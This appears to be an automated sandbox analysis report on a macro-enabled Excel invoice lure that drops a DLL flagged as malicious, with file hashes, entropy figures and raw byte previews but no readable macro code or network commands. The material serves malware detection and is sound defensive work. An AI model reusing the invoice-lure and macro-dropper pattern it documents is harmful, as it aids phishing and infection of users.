                                                                                                                              Preview: V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.4.9.3.9.7.8.8.4.7.7.5.5.2.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.4.9.3.9.8.0.5.4.8.1.5.8.2.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.d.a.f.8.8.2.6.-.5.4.e.c.-.1.1.e.b.-.a.d.c.f.-.e.c.f.4.b.b.b.5.9.1.5.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.d.a.f.8.8.2.5.-.5.4.e.c.-.1.1.e.b.-.a.d.c.f.-.e.c.f.4.b.b.b.5.9.1.5.b.....R.e.s.p.o.n.s.e...B.u.c.k.e.t.I.d.=.3.7.0.1.1.5.9.2.6.1.....R.e.s.p.o.n.s.e...B.u.c.k.e.t.T.a.b.l.e.=.3.8.0.7.0.7.5.2.5.....R.e.s.p.o.n.s.e...t.y.p.e.=.4.....S.i.g.[.0.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .N.a.m.e.....S.i.g.[.0.]...V.a.l.u.e.=.E.X.C.E.L...E.X.E.....S.i.g.[.1.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .V.e.r.s.i.o.n.....S.i.g.[.1.]...V.a.l.u.e.=.1.4...0...7.0.1.5...1.0.0.0.....S.i.g.[.2.]...N.a.m.e.=.A.p.p.l.i.c.a.t.i.o.n. .T.i.m.e.s.t.a.m.p.....S.i.g.[.2.]...V.a.l.u.e.=.5.1.c.c.a.7.c.d.....S.i.g.[.3.]...N.a.m.
                                                                                                                              C:\Users\user\AppData\Local\Temp\999872.cvr
                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1392
                                                                                                                              Entropy (8bit):3.148340654858081
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:+ll/pRCCcmvsqI8FfOdqOLQQl/axwCktXH4apWFvkhDKbeUP++E7foPRuC+fURKU:+ll/pvT6gcleOCiy+gZuDsAU
                                                                                                                              MD5:62CF8759F67DB74A22B811F6004A7DB6
                                                                                                                              SHA1:442DB0B8FA00FE4045CB19F5A8A71D5363F444A5
                                                                                                                              SHA-256:97BAAE07733977E62B6D083A03EBFCADD88EB56761A075F754C64E2276403DEA
                                                                                                                              SHA-512:9EA986064C7911F7F9766A83318FC2D6ED6DDF50970B4C80F884E69069491F7E26B604239A33AEC9DF5D63B2739B9239BD126C3EA7D2543A788D197CCABA1BA0
                                                                                                                              Malicious:false
                                                                                                                              Preview: MSQMx...........................g.......................h...........................................................................................g......EXCE........................................5...g.......;...........<...........A...........l...........................z...N"......................N"...................................................................................!..........+.......................+...........1...b...........N....................K..C...........F...........Q...........W........,..........M,......................d!..........d!..........d!..........d!..+...........0...........:...........;...................z ..........................................................G...........G.... ..........:!.......!..n"..........."......M,..."......M,..."......M,..."......M,..."......M,..."......M,..7#..........?...E...G.......E...G........................!......<...B............+../..................."K../.......................$...$............+..n370...."K..
                                                                                                                              C:\Users\user\AppData\Local\Temp\CabF71B.tmp
                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                              File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):58936
                                                                                                                              Entropy (8bit):7.994797855729196
                                                                                                                              Encrypted:true
                                                                                                                              SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                                                                              MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                                                                              SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                                                                              SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                                                                              SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                                                                              Malicious:false
                                                                                                                              Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                                                                              C:\Users\user\AppData\Local\Temp\ECFE0000
                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):58876
                                                                                                                              Entropy (8bit):7.857491563402148
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:hdAmaHr40WZUaY7DD5xr/9AL+XgTLNFqHA:himaL40mUaY7x1E+X6aA
                                                                                                                              MD5:C2FBE4D3A75F3450ABDBDE7EBE2C57E8
                                                                                                                              SHA1:609C0EC81CA6F725770A0C15925DD73D03F969BE
                                                                                                                              SHA-256:787788CA81F91FC4E3CFD5E2575ADDDFE68574586D15F4EBD95D5361E08B6A67
                                                                                                                              SHA-512:8EE63A3027AB76A7797E787196CE35C0F6CDDF8A601772F0E855E95494D39CE01699624750F32005E9C2165A12E50DE1B627DD45BEF2CC3D9C577923B1AB3827
                                                                                                                              Malicious:false
                                                                                                                              Preview: ...n.0.E.......H...(,g..6@S.[......(..w(9...a....u..q...........+R..N*....o.gR....Y..."....~<z...m..>%...(.`x..........\..........&..L.l.wP.'.......l.%........^+.....+/ ..k%@:.d.F....HFS....OH.....2..]0..1....0...-..&......|_;.....W>~......x..u.n.....+.....*(.....;7..Y.....s.:.e..XB+@..3R.Ep..o5..W...#...N.Yw.Y.|U.`rBK)o.dz..g.H.{...k........t.....4.m...3d...N..?.........N.k.....DO....A..b...-.....D.....q..8..,../#..K.F.......3...r..q... ..;.6........PK..........!.........*.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd
                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):241332
                                                                                                                              Entropy (8bit):4.206829785968174
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:cGmLEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:czNNSk8DtKBrpb2vxrOpprf/nVq
                                                                                                                              MD5:04BD5B6696E515B678CE16586EA12280
                                                                                                                              SHA1:B3CADD6952256E34D589D72A7C0D5A72244858F5
                                                                                                                              SHA-256:4BB0CFE24122BCD6AF99616E37AD30EB2B83A2171AD74B0616447F43130F2B8A
                                                                                                                              SHA-512:8A4AFE5A20CB59BD5A103B6CDDB00A3F2058BE87C1EDFBFF9D9A15A7BDC4EEF22D78DC03866A9C2CB10C71533520DEB392D5D925DB0D4A50F633398AB1D2CF4A
                                                                                                                              Malicious:false
                                                                                                                              Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................H...4............................................................................x...I..............T............ ..P........................... ...........................................................&!..............................................................................................
                                                                                                                              C:\Users\user\AppData\Local\Temp\TarF71C.tmp
                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):152533
                                                                                                                              Entropy (8bit):6.31602258454967
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                                                                                              MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                                                                                              SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                                                                                              SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                                                                                              SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                                                                                              Malicious:false
                                                                                                                              Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                                                              C:\Users\user\AppData\Local\Temp\WER4329.tmp.WERInternalMetadata.xml
                                                                                                                              Process:C:\Windows\System32\DWWIN.EXE
                                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3110
                                                                                                                              Entropy (8bit):3.6846455695361846
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:Shz4tU6o7VxBt3uhhgHPe40PAn5xp3UO3:Wl7LBNuhhgG45nv55
                                                                                                                              MD5:7A76CF4A63CAA99EEF79C38AA80AAF0F
                                                                                                                              SHA1:03C8726703129F52FD529E560942F8FADF1EA117
                                                                                                                              SHA-256:6E9F0EE19A5B245447D488FA363AD2BBDD3404CC8C9D6EF55FE70D68912B458A
                                                                                                                              SHA-512:4B8B6D7BCD7CFDEADEF3E5FDD76B51F202833FD60B5A0BC3F240C99F3A88136402DAE1CA30EA00F8A9C210ED6FFE0A127ABCC7C11B01E9E8FBCC77E07038D13C
                                                                                                                              Malicious:false
                                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.6...1.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.7.6.0.1. .S.e.r.v.i.c.e. .P.a.c.k. .1.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .7. .P.r.o.f.e.s.s.i.o.n.a.l.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.7.6.0.1...2.3.6.7.7...a.m.d.6.4.f.r.e...w.i.n.7.s.p.1._.l.d.r...1.7.0.2.0.9.-.0.6.0.0.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.3.0.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.a.r.e.n.t.P.r.o.c.e.s.s.I.
                                                                                                                              C:\Users\user\AppData\Local\Temp\bjcbglsw.dll
                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):319488
                                                                                                                              Entropy (8bit):7.125176562164236
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6144:5HdO040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwUX:RdO02Srnh0qEJC+Y218jdU
                                                                                                                              MD5:597B02A17B8C012E25FA0A668004163B
                                                                                                                              SHA1:424A6F131D5C765EFDB28E5CAAE5FE2834A82BB0
                                                                                                                              SHA-256:E3F7EB34C3A1FD306C7788096CB666F3362BA5AA78710074B61DD03F829B8AFD
                                                                                                                              SHA-512:C75D875F3ABE620779380E7AE0F4BBB59B0C823B40889084B51396CD166187CBD90F7FB4159969DF1C7C241930BAA93BD051BF2F8FFF9CB8402D00CFB60062D4
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                              Joe Sandbox View:
                                                                                                                              • Filename: Inv0209966048-20210111075675.xls, Detection: malicious, Browse
                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:._...........!...2.z...b.......&.......@...............................@..........................................................|....................0.......................................................................................text....$.......&.................. ..`.rdata.......@.......*..............@..@.rdata3......P.......,..............@..@.2...........`.......0..............@..@.rdata2.6....p.......2..............@..@.data................4..............@....text4...R.......T...R.............. ..@.rsrc...|........0..................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Excel\~ar1479.xar
                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:modified
                                                                                                                              Size (bytes):53145
                                                                                                                              Entropy (8bit):7.833234247137564
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:1XSG3BX6F8kyhrQMxE9lzXW0o5LDQAB5dbTQGR:11xE8jABWBdP5dPb
                                                                                                                              MD5:6012E5A6CC8CDCCD4A52AABA0323F51C
                                                                                                                              SHA1:D3CF935301859A406621EC8AF2EE1A8B5DCAE469
                                                                                                                              SHA-256:20C5174BB28C025870E4038A7542C47D02D728A5A840285C2C1A74A68F3449D5
                                                                                                                              SHA-512:266AA268CC668DBECAF4F1170FFF19C10B813F8ECFF0E007B5E88EAC34474DDF0049E55559BD401C09A632DD187513A9BC85CF903933799CF3EF21DEB55C4EC3
                                                                                                                              Malicious:false
                                                                                                                              Preview: .V...0..W.? ..v....B...J=.].[.W...w.m.^..}.@......%..{o<o<...UR....<].U...FH.......i...).!O......7..... Z.<=.`?R...J..q.0.d.o.Z......j..r....n77P.G........N.O.{Q*O..Jr.0PZiAJ.A.A........I.3.....+.Y. .....,c|..0..b.Qgqe..@......\e...Ad.U....d.(..<..I\.o/0S...0..D...o.{.2..}..rR@r.\..J...6f4.x.\...x.|}F.hK...P/.B\...'...{x.VN.y.......<.@..5....e...+.*.../q.EL..:........=...q....u.D.w.H...].....L...........x.....u.,6.....T.....s.1ai.cw........1n.Hl=.C..O..&EDg......Y1t.O.8....&..a-@.h...`........PK..........!...>,....].......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Jan 12 14:42:52 2021, atime=Tue Jan 12 14:42:52 2021, length=8192, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):867
                                                                                                                              Entropy (8bit):4.479469044579857
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:85QliCLgXg/XAlCPCHaXtB8XzB/jWOU3XX+Wnicvb4+bDtZ3YilMMEpxRljKFTdK:856iU/XTd6jFWOMXYelDv3qcrNru/
                                                                                                                              MD5:49D989898FFCAF075119D158B0F63E8B
                                                                                                                              SHA1:1CE86D56DAECE349040CBA2E1D6ADF1FA5D77E60
                                                                                                                              SHA-256:0AE8AFE0A665DD55E25355113355BCD900C7FA4CCCE511E66A547C08D49E3CA7
                                                                                                                              SHA-512:D4EA7EB1201B748FF1F32E2191452B2C226CC84101C5B181163C11C3E0722BCA70CBA9475A0FE8F2B8D956BE0AC5750A7C63300ECEA6F2D38F82839FD18F6E89
                                                                                                                              Malicious:false
                                                                                                                              Preview: L..................F...........7G................... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....,R[}..Desktop.d......QK.X,R[}*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\468325\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......468325..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\INV8222874744_20210111490395.LNK
                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Tue Jan 12 14:42:52 2021, atime=Tue Jan 12 14:43:00 2021, length=58882, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2218
                                                                                                                              Entropy (8bit):4.514916532800293
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:8KZk/XTd6jFyl2HG7aeli7IDv3qcdM7dD2KZk/XTd6jFyl2HG7aeli7IDv3qcdMj:8L/XT0jFycfBcQh2L/XT0jFycfBcQ/
                                                                                                                              MD5:B390C8B91CEF8CE02AB0C8FD8F0CE8C3
                                                                                                                              SHA1:D44C9D9829A842223FCD553A55854244B46938D1
                                                                                                                              SHA-256:F77740D930D8D31B43078E71CFB74E73967291F8F331E8747482BD16DD413396
                                                                                                                              SHA-512:CAE4631249E5F315CC141A49CBB87C5C0F7244A2973F12FDE3985BAC0EFB59FE38580E55B461BF6DFF0AE3971D33E02EB05B0B57542AC73E5D0C423061A3C52A
                                                                                                                              Malicious:false
                                                                                                                              Preview: L..................F.... ......{..........].c..................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.(...,RS} .INV822~1.XLS..p.......Q.y.Q.y*...8.....................I.N.V.8.2.2.2.8.7.4.7.4.4._.2.0.2.1.0.1.1.1.4.9.0.3.9.5...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\468325\Users.user\Desktop\INV8222874744_20210111490395.xlsm.8.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.N.V.8.2.2.2.8.7.4.7.4.4._.2.0.2.1.0.1.1.1.4.9.0.3.9.5...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6....
                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):139
                                                                                                                              Entropy (8bit):4.525575175052369
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:oyBVomxWnnVXFcmAR0AC0VXFcmAR0ACmxWnnVXFcmAR0ACv:djUn9um03vum036n9um03s
                                                                                                                              MD5:2AE03DDEFDCC0CF8B75D71BA439E47D2
                                                                                                                              SHA1:95E3E444A034076242F0BA020F23854631380102
                                                                                                                              SHA-256:FB0F9DE0086930ED62A76A414D959A9D2F031520F09CC8943476907DECF8BDED
                                                                                                                              SHA-512:8EF34E1BB5B68B41438E48AC5643178C4C415AD9946CC8FEE8C603751291BB275A4B59B8D5D7D35639D8D21E32D073C6B19638FA55C0832D3ED77ECBEE6B10A9
                                                                                                                              Malicious:false
                                                                                                                              Preview: Desktop.LNK=0..[misc]..INV8222874744_20210111490395.LNK=0..INV8222874744_20210111490395.LNK=0..[misc]..INV8222874744_20210111490395.LNK=0..
                                                                                                                              C:\Users\user\Desktop\B70F0000
                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):58882
                                                                                                                              Entropy (8bit):7.856696209772593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:hdAmaHr40WZw9N1AnaERZj9iDqvDgTLNFqqo:himaL40mEAna8TFvD6do
                                                                                                                              MD5:0A4F968D9B316EB75BEB1678ECFD1A74
                                                                                                                              SHA1:C01B5162C1FC49B3BF302362110AEE981BE558FA
                                                                                                                              SHA-256:A7B46EEBEDD2500A8099B1D72DE5A759C972FE12EA6CC049E4AB0F94D8B38FFF
                                                                                                                              SHA-512:20ADB1D7550DDE687E83150E5A75AF71C95DDF2AB992A85B5E9E60B6A24AC5884CF45812D80580CF4B47C55BB5EEE33769208CAE6FE12363DC8184065207A4EA
                                                                                                                              Malicious:false
                                                                                                                              Preview: ...n.0.E.......H...(,g..6@S.[......(..w(9...a....u..q...........+R..N*....o.gR....Y..."....~<z...m..>%...(.`x..........\..........&..L.l.wP.'.......l.%........^+.....+/ ..k%@:.d.F....HFS....OH.....2..]0..1....0...-..&......|_;.....W>~......x..u.n.....+.....*(.....;7..Y.....s.:.e..XB+@..3R.Ep..o5..W...#...N.Yw.Y.|U.`rBK)o.dz..g.H.{...k........t.....4.m...3d...N..?.........N.k.....DO....A..b...-.....D.....q..8..,../#..K.F.......3...r..q... ..;.6........PK..........!.........*.......[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              C:\Users\user\Desktop\~$INV8222874744_20210111490395.xlsm
                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):330
                                                                                                                              Entropy (8bit):1.4377382811115937
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                              MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                              SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                              SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                              SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                              Malicious:true
                                                                                                                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                              Static File Info

                                                                                                                              General

                                                                                                                              File type:Microsoft Excel 2007+
                                                                                                                              Entropy (8bit):7.775569597872742
                                                                                                                              TrID:
                                                                                                                              • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                                                                                                                              • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                                                                                                                              • ZIP compressed archive (8000/1) 7.58%
                                                                                                                              File name:INV8222874744_20210111490395.xlsm
                                                                                                                              File size:42241
                                                                                                                              MD5:032734a3c93c44855955d4769b7ded98
                                                                                                                              SHA1:f38cd18659e0fb5d862bac1d9f24691dda4a292c
                                                                                                                              SHA256:1e66c639f157fa066c2e4070a46cb0af32548f4fba63684120513433059cd26d
                                                                                                                              SHA512:cd662cd2810fef6a50e9ad4fc9c43e2e56d6c6329a432a19709ea410e3cd8d6f5308a04a8f3f82604dea3e0c8aaa7b3d9959ad8815b097acf11207b32ba41ba9
                                                                                                                              SSDEEP:768:wT1rKsMOiiWLB7m7dMEuiJD/IxuKLh5XKZ0hVqu8:KVMOkLB7m7hh/Ix5LvaZMqu8
                                                                                                                              File Content Preview:PK..........!.o.m.....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                              File Icon

                                                                                                                              Icon Hash:e4e2aa8aa4bcbcac

                                                                                                                              Static OLE Info

                                                                                                                              General

                                                                                                                              Document Type:OpenXML
                                                                                                                              Number of OLE Files:2

                                                                                                                              OLE File "/opt/package/joesandbox/database/analysis/338363/sample/INV8222874744_20210111490395.xlsm"

                                                                                                                              Indicators

                                                                                                                              Has Summary Info:False
                                                                                                                              Application Name:unknown
                                                                                                                              Encrypted Document:False
                                                                                                                              Contains Word Document Stream:
                                                                                                                              Contains Workbook/Book Stream:
                                                                                                                              Contains PowerPoint Document Stream:
                                                                                                                              Contains Visio Document Stream:
                                                                                                                              Contains ObjectPool Stream:
                                                                                                                              Flash Objects Count:
                                                                                                                              Contains VBA Macros:True

                                                                                                                              Summary

                                                                                                                              Author:
                                                                                                                              Last Saved By:
                                                                                                                              Create Time:2020-12-07T14:38:21Z
                                                                                                                              Last Saved Time:2021-01-11T15:24:48Z
                                                                                                                              Creating Application:Microsoft Excel
                                                                                                                              Security:0

                                                                                                                              Document Summary

                                                                                                                              Thumbnail Scaling Desired:false
                                                                                                                              Company:
                                                                                                                              Contains Dirty Links:false
                                                                                                                              Shared Document:false
                                                                                                                              Changed Hyperlinks:false
                                                                                                                              Application Version:16.0300

                                                                                                                              Streams with VBA

                                                                                                                              VBA File Name: Module1.bas, Stream Size: 3200
                                                                                                                              General
                                                                                                                              Stream Path:VBA/Module1
                                                                                                                              VBA File Name:Module1.bas
                                                                                                                              Stream Size:3200
                                                                                                                              Data ASCII:. . . . . . . . . * . . . . . . . . . . . . . . . X . . . . . . . . . . . . . . . . x . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
